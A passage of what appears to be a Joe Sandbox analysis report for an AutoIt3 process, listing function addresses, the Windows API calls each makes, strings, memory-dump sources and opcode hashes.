                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 59a7e03ceace17a9d2ad13a39238ea482b8b29135fe41c262f46615a9832dd1e
                                      • Instruction ID: 3c061367c6dfe12228bded46c4604a91c146360b18caf02b8f2fb894a263ea59
                                      • Opcode Fuzzy Hash: 59a7e03ceace17a9d2ad13a39238ea482b8b29135fe41c262f46615a9832dd1e
                                      • Instruction Fuzzy Hash: 8321367261420AAFDB04EFA8CC45AEA7BB8FB48304F144519FD55D3250D734E8519B50
                                      Function 00886F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00886FC7
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00886FD6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 4f2e2d2654da4cda48c43c1c0a6cd2ec2d453555f148b2f02496a60b06d91ae6
                                      • Instruction ID: 5da086b7ca5ca5ab8dbe577a081ebdc000c9070e87ca8fcd6c0b2869fd0af78c
                                      • Opcode Fuzzy Hash: 4f2e2d2654da4cda48c43c1c0a6cd2ec2d453555f148b2f02496a60b06d91ae6
                                      • Instruction Fuzzy Hash: CA113D71500209AFEB11AE64AC84EAB3B6AFB05368F104714FA64D71E0EB75EC619B60
                                      Function 00863156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 008631C9
                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008631E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 7444bbc1c165bedb73946372d2e49d99ecff6c84ce0e4006b1e1c60addcc3fe1
                                      • Instruction ID: 85ba93c9334dcbedd7eabf3413aaf4d216d52f3048dd6ec81c1deea11001abeb
                                      • Opcode Fuzzy Hash: 7444bbc1c165bedb73946372d2e49d99ecff6c84ce0e4006b1e1c60addcc3fe1
                                      • Instruction Fuzzy Hash: DC11DD31900228ABDB20DA98DC45FADB7B8FB06310F16012AF956E72A0D770AF05CB91
                                      Function 008728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008728F8
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00872921
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 152d4be9b3ad78275f82c8b43b71934a0cdcbc207670da025360022f5481fc16
                                      • Instruction ID: 4805de80390b3fd32266792ff948e08724d66df483d3929ebff2d435f0858a97
                                      • Opcode Fuzzy Hash: 152d4be9b3ad78275f82c8b43b71934a0cdcbc207670da025360022f5481fc16
                                      • Instruction Fuzzy Hash: D411E370501229BAEB248F518C88EF7FFACFF05364F10C13AF95982100E3719990DAE1
                                      Function 00878475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008786E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0087849D,?,00000000,?,?), ref: 008786F7
                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008784A0
                                      • htons.WSOCK32(00000000,?,00000000), ref: 008784DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 2496851823-2422070025
                                      • Opcode ID: 71ce419d111c59fb8957c846f453b2a201f67656809d2295fc8f8681b92e0648
                                      • Instruction ID: e2d5c4d779969aafc43b6e28944030afc42e832fa05b2d84b262582fecc77207
                                      • Opcode Fuzzy Hash: 71ce419d111c59fb8957c846f453b2a201f67656809d2295fc8f8681b92e0648
                                      • Instruction Fuzzy Hash: 3411A53524021AABDB20AF64DC4AFEEB768FF04320F108516FA19D7291DB71E854CA99
                                      Function 008599BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00859A2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 6aeeae9f236d9f84dcaf9cd98837c0fcfb77771a22cf7f77a0aa16c38a1fafb4
                                      • Instruction ID: f7005a175e3ec4b7cc8f15f6816bb24d5630038b8859eb28b437d94640305c8c
                                      • Opcode Fuzzy Hash: 6aeeae9f236d9f84dcaf9cd98837c0fcfb77771a22cf7f77a0aa16c38a1fafb4
                                      • Instruction Fuzzy Hash: 8801DE71A42228AB8F14EBA8CC56CFE7769FF56360B000609FCB2D33C1EA30594C9661
                                      Function 0086934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: 7eac2640f7277005782a46e63dc33392eb15e5290b9bd08dae75d598c8f629d6
                                      • Instruction ID: 29ce31809a6c94d3794960759cd3736080b28a2fabae1684e6ccd593c4e955e4
                                      • Opcode Fuzzy Hash: 7eac2640f7277005782a46e63dc33392eb15e5290b9bd08dae75d598c8f629d6
                                      • Instruction Fuzzy Hash: 5301F9728042687EDB28C6A8C856EFE7BFCEB11301F00419AF592D66C1E5B4E6048760
                                      Function 008598B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00859923
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 71270297c5dcabd01705e4172146904169fe3e2182e2ed134010a4c7eaa8a9ce
                                      • Instruction ID: 2fd22394b06fb267367030b56698743b549f50684653e24ecb24c9f5ce4f38ef
                                      • Opcode Fuzzy Hash: 71270297c5dcabd01705e4172146904169fe3e2182e2ed134010a4c7eaa8a9ce
                                      • Instruction Fuzzy Hash: EF01D472A41108ABCF14EBA4C956EFE77ADFF15340F100019FD51E3281EA105F0C96B2
                                      Function 00829632 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00829BDC: __getptd_noexit.LIBCMT ref: 00829BDD
                                      • __lock.LIBCMT ref: 00829673
                                      • _free.LIBCMT ref: 008296A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit__lock_free
                                      • String ID: `
                                      • API String ID: 1533244847-4168407445
                                      • Opcode ID: 84d177bcc556d45b7202bf1fa7d59ed25d1a7a2942e2b3b747852b4cf7e0547c
                                      • Instruction ID: f6e1fc546e3158abd7c600e94bfbd87f7f30e9d2dc93ce8606f56c6616441151
                                      • Opcode Fuzzy Hash: 84d177bcc556d45b7202bf1fa7d59ed25d1a7a2942e2b3b747852b4cf7e0547c
                                      • Instruction Fuzzy Hash: EB113C76D01632EBCB21AF6CA801A59B7F0FF54B60F15411AE894E3290CB3459828FC6
                                      Function 0085993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 008599A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: b12e43945002b3d316b2013373a479a34972f370d3b16a38d823de30bc704d2d
                                      • Instruction ID: 6a9884edb463655f1e980f3568cf75913973ebeba50709ea7058cd2c3f534390
                                      • Opcode Fuzzy Hash: b12e43945002b3d316b2013373a479a34972f370d3b16a38d823de30bc704d2d
                                      • Instruction Fuzzy Hash: 6001A772A41118A7CF14EBA8C916EFE7BADFF15341F140019FD85E3281DA155F4C96B2
                                      Function 008654E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp
                                      • String ID: #32770
                                      • API String ID: 2292705959-463685578
                                      • Opcode ID: 5803b9df59cb8a3da549033cca55abab72cff600f58b0aa3ca84cb971d8f8a4a
                                      • Instruction ID: b2f63f46e20b806c5cdc0d4850a55f7135e908baa2f0a6e64d56fb4812de4a1b
                                      • Opcode Fuzzy Hash: 5803b9df59cb8a3da549033cca55abab72cff600f58b0aa3ca84cb971d8f8a4a
                                      • Instruction Fuzzy Hash: E8E09B725002296BD710A699AC49E97F7ACFB55771F000057B904D6151D5A0994587D1
                                      Function 00858892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008588A0
                                        • Part of subcall function 00823588: _doexit.LIBCMT ref: 00823592
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: eb2c209a191b69c3ebcc9d6d126b8bdac186c1c24b40de7a82abadf919b63113
                                      • Instruction ID: 107be94665757b0fee21515f99db9a3d0f60892175898f3117c2866d6cbe335e
                                      • Opcode Fuzzy Hash: eb2c209a191b69c3ebcc9d6d126b8bdac186c1c24b40de7a82abadf919b63113
                                      • Instruction Fuzzy Hash: F5D0127228536836D61532AC7D1AFCA7A48EB15B51F144426BB18E52C349D985D04196
                                      Function 0083B4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0083B544: _memset.LIBCMT ref: 0083B551
                                        • Part of subcall function 00820B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0083B520,?,?,?,0080100A), ref: 00820B79
                                      • IsDebuggerPresent.KERNEL32(?,?,?,0080100A), ref: 0083B524
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0080100A), ref: 0083B533
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0083B52E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 3158253471-631824599
                                      • Opcode ID: 9251b878b6358dc24caef4d4375657f635e6fe536f3cf33ddc163e0ae17ffedf
                                      • Instruction ID: eb2c2832fce692c006330677d68094ca8e80abbccd29c89425c4098bf616b78c
                                      • Opcode Fuzzy Hash: 9251b878b6358dc24caef4d4375657f635e6fe536f3cf33ddc163e0ae17ffedf
                                      • Instruction Fuzzy Hash: C5E065B02007118FE320AF79E809B02BAE0FF44315F14891EE596C6741EBB4E548CFA2
                                      Function 00840251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00840091
                                        • Part of subcall function 0087C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0084027A,?), ref: 0087C6E7
                                        • Part of subcall function 0087C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0087C6F9
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00840289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                      • String ID: WIN_XPe
                                      • API String ID: 582185067-3257408948
                                      • Opcode ID: ab6387edc2d44821c46e156f40d424c693a9d9e5f063f37f6633a5825d107f6b
                                      • Instruction ID: a0ba704b1edf7003e1d1a1d2511e6ab0d2f08fbd808cf7cf53906bdc4195235c
                                      • Opcode Fuzzy Hash: ab6387edc2d44821c46e156f40d424c693a9d9e5f063f37f6633a5825d107f6b
                                      • Instruction Fuzzy Hash: 6EF0C97180950DDFCB55DBA4C998BEDBBB8FB48308F240486E246E2190CB719F84DF21
                                      Function 00869EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00869EB5
                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00869ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: b539ebd262410884f74415ee4f7d850d5a1d6167c62a15611a3fdfb30f156703
                                      • Instruction ID: f5e9fe5441ecaed6fd4bad70e8089bac4f35a395334faeb74f270186f68e4878
                                      • Opcode Fuzzy Hash: b539ebd262410884f74415ee4f7d850d5a1d6167c62a15611a3fdfb30f156703
                                      • Instruction Fuzzy Hash: 13D05E7654030DAFDB50ABD0DC0EFDBBB2CFB04700F0042A2BE58951A2DAB059988F95
                                      Function 00885FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00885FAB
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00885FBE
                                        • Part of subcall function 008657FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865877
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: ea13ab9e1909e71f8234d5186214d72f32a55fcedc68a65358099b0cc1137c32
                                      • Instruction ID: b16d975352e1d646b4d21a221be352b0a7dc9957a89569df742281a71e0d620a
                                      • Opcode Fuzzy Hash: ea13ab9e1909e71f8234d5186214d72f32a55fcedc68a65358099b0cc1137c32
                                      • Instruction Fuzzy Hash: 84D0C931384311BBE664B7749C5BFD66A14BB50B50F050826B26AEA2D0CAE46800CA54
                                      Function 00885FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00885FEB
                                      • PostMessageW.USER32(00000000), ref: 00885FF2
                                        • Part of subcall function 008657FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865877
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: ad9355aef2dd1660700a63caf4ab1589e9bdac2ed6e244fc39375cda5661d58c
                                      • Instruction ID: 7b81b7c0c432dd66db23dcbc10f20ee2729808a4247f8cf56e9443c3d5ae9219
                                      • Opcode Fuzzy Hash: ad9355aef2dd1660700a63caf4ab1589e9bdac2ed6e244fc39375cda5661d58c
                                      • Instruction Fuzzy Hash: DDD0C931381311BFE664B7749C4BFD66A14BB55B50F050826B266EA2D0CAE46800CA54
                                      Function 00814D8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyIcon.USER32(0002044F), ref: 00814D96
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
